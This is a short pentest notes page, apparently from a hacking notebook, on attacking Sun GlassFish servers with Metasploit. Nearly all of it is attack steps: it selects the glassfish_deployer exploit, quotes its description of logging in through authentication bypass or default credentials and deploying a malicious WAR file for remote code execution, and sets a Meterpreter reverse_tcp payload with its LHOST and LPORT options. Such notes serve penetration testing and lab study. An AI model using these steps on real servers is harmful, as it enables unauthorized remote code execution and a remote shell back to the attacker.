Sun Glassfish

search Sun GlassFish

Check if a module will work on the specific version of the service

use exploit/multi/http/glassfish_deployer
info

# Description:
#   This module logs in to a GlassFish Server (Open Source or
#   Commercial) using various methods (such as authentication bypass,
#   default credentials, or user-supplied login), and deploys a
#   malicious war file in order to get remote code execution. It has
#   been tested on Glassfish 2.x, 3.0, 4.0 and Sun Java System
#   Application Server 9.x. Newer GlassFish versions do not allow remote
#   access (Secure Admin) by default, but is required for exploitation.

set payload windows/meterpreter/reverse_tcp
options
# check the LHOST, LPORT, APP_RPORT, RPORT, PAYLOAD options

PreviousApache httpd 2.4.7-XODA Vulnerability NextApache-Shellshock(Bash)

Last updated 1 year ago